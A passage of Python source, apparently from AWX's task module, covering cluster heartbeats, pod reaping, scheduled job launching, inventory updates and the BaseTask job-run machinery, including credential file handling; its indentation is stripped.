logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all_non_isolated())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# If any other node reports a newer version than this one, shut down services on this node.
for other_inst in instance_list:
if other_inst.version == "":
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisioning is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
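# Delete orphaned container-group pods whose corresponding jobs are no longer in an active state.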
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_isolated_heartbeat():
local_hostname = settings.CLUSTER_HOST_ID
logger.debug("Controlling node checking for any isolated management tasks.")
poll_interval = settings.AWX_ISOLATED_PERIODIC_CHECK
# Get isolated instances not checked since poll interval - some buffer
nowtime = now()
accept_before = nowtime - timedelta(seconds=(poll_interval - 10))
isolated_instance_qs = Instance.objects.filter(
rampart_groups__controller__instances__hostname=local_hostname,
)
isolated_instance_qs = isolated_instance_qs.filter(last_isolated_check__lt=accept_before) | isolated_instance_qs.filter(last_isolated_check=None)
# Fast pass of isolated instances, claiming the nodes to update
with transaction.atomic():
for isolated_instance in isolated_instance_qs:
isolated_instance.last_isolated_check = nowtime
# Prevent modified time from being changed, as in normal heartbeat
isolated_instance.save(update_fields=['last_isolated_check'])
# Slow pass looping over isolated IGs and their isolated instances
if len(isolated_instance_qs) > 0:
logger.debug("Managing isolated instances {}.".format(','.join([inst.hostname for inst in isolated_instance_qs])))
isolated_manager.IsolatedManager(CallbackQueueDispatcher.dispatch).health_check(isolated_instance_qs)
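# Under an advisory lock, launch jobs for enabled schedules that became due since the last
# scheduler run; spawned jobs are failed immediately if the license check raises PermissionDenied.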
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
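# When a task in a dependency chain fails, mark its unfinished subtasks as failed with a
# pointer to the first failed instance, then wake the task manager.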
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
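# Reconcile the cached SmartInventoryMembership rows with the hosts currently matched by the
# smart inventory's host_filter; returns True if any memberships changed.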
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def migrate_legacy_event_data(tblname):
#
# NOTE: this function is not actually in use anymore,
# but has been intentionally kept for historical purposes,
# and to serve as an illustration if we ever need to perform
# bulk modification/migration of event data in the future.
#
if 'event' not in tblname:
return
with advisory_lock(f'bigint_migration_{tblname}', wait=False) as acquired:
if acquired is False:
return
chunk = settings.JOB_EVENT_MIGRATION_CHUNK_SIZE
def _remaining():
try:
cursor.execute(f'SELECT MAX(id) FROM _old_{tblname};')
return cursor.fetchone()[0]
except ProgrammingError:
# the table is gone (migration is unnecessary)
return None
with connection.cursor() as cursor:
total_rows = _remaining()
while total_rows:
with transaction.atomic():
cursor.execute(f'INSERT INTO {tblname} SELECT * FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk} RETURNING id;')
last_insert_pk = cursor.fetchone()
if last_insert_pk is None:
# this means that the SELECT from the old table was
# empty, and there was nothing to insert (so we're done)
break
last_insert_pk = last_insert_pk[0]
cursor.execute(f'DELETE FROM _old_{tblname} WHERE id IN (SELECT id FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk});')
logger.warning(f'migrated int -> bigint rows to {tblname} from _old_{tblname}; # ({last_insert_pk} rows remaining)')
if _remaining() is None:
cursor.execute(f'DROP TABLE IF EXISTS _old_{tblname}')
logger.warning(f'{tblname} primary key migration to bigint has finished')
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
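# Decorator for BaseTask.run(): after the wrapped call returns, remove any temporary files or
# directories that were registered in self.cleanup_paths.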
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
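# Shared machinery for the Run* task classes: model update with retry, private data dir and
# credential file handling, ansible-runner callbacks, and the overall run() lifecycle.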
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
if instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = instance = self.update_model(instance.pk, execution_environment=instance.resolve_execution_environment())
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
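# If the execution environment's registry credential carries host/username/password, write a
# podman-style auth.json beside the private data dir and pass it to the container via --authfile.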
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('ascii')).decode()}}}
authfile.write(json.dumps(auth_data, indent=4))
authfile.close()
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'].append(f'{this_path}:{this_path}:Z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form
{'credentials': {<Credential>: <decrypted ssh_key_data>, ...},
 'certificates': {<Credential>: <signed SSH certificate data>, ...}}
(see the subclass implementations); the base implementation returns None.
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
runner_project_folder = os.path.join(path, 'project')
if not os.path.exists(runner_project_folder):
# Ansible Runner requires that this directory exists.
# Specifically, when using process isolation
os.mkdir(runner_project_folder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=private_data_dir)
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def build_params_resource_profiling(self, instance, private_data_dir):
resource_profiling_params = {}
if self.should_use_resource_profiling(instance):
cpu_poll_interval = settings.AWX_RESOURCE_PROFILING_CPU_POLL_INTERVAL
mem_poll_interval = settings.AWX_RESOURCE_PROFILING_MEMORY_POLL_INTERVAL
pid_poll_interval = settings.AWX_RESOURCE_PROFILING_PID_POLL_INTERVAL
results_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
if not os.path.isdir(results_dir):
os.makedirs(results_dir, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
# FIXME: develop some better means of referencing paths inside containers
container_results_dir = os.path.join('/runner', 'artifacts/playbook_profiling')
logger.debug(
'Collected the following resource profiling intervals: cpu: {} mem: {} pid: {}'.format(cpu_poll_interval, mem_poll_interval, pid_poll_interval)
)
resource_profiling_params.update(
{
'resource_profiling': True,
'resource_profiling_base_cgroup': 'ansible-runner',
'resource_profiling_cpu_poll_interval': cpu_poll_interval,
'resource_profiling_memory_poll_interval': mem_poll_interval,
'resource_profiling_pid_poll_interval': pid_poll_interval,
'resource_profiling_results_dir': container_results_dir,
}
)
return resource_profiling_params
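# Write extra vars to env/extravars; unless ALLOW_JINJA_IN_EXTRA_VARS is 'always', values are
# written with safe_dump so user-supplied Jinja outside of safe_dict is not rendered.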
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, isolated, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
return env
def should_use_resource_profiling(self, job):
"""
Return whether this task should use resource profiling
"""
return False
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
os.makedirs(path, mode=0o700)
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_cwd(self, instance, private_data_dir):
raise NotImplementedError
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times, isolated_manager_instance=None):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warning('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
def check_handler(self, config):
"""
IsolatedManager callback triggered by the repeated checks of the isolated node
"""
job_env = build_safe_env(config['env'])
for k, v in self.safe_cred_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(config['command']), job_cwd=config['cwd'], job_env=job_env)
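# run() drives the full job lifecycle: build the private data dir, credentials, env, args and
# inventory; execute via ansible-runner (directly for SystemJobs, otherwise through
# AWXReceptorJob); then apply the post/final run hooks and emit the final status.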
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
# keep the job on self.instance: update_model() returns a fresh copy, and the callback handlers rely on self.instance being current
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
isolated_manager_instance = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
try:
isolated = self.instance.is_isolated()
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# store a record of the venv used at runtime
if hasattr(self.instance, 'custom_virtualenv'):
self.update_model(pk, custom_virtualenv=getattr(self.instance, 'ansible_virtualenv_path', settings.ANSIBLE_VENV_PATH))
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
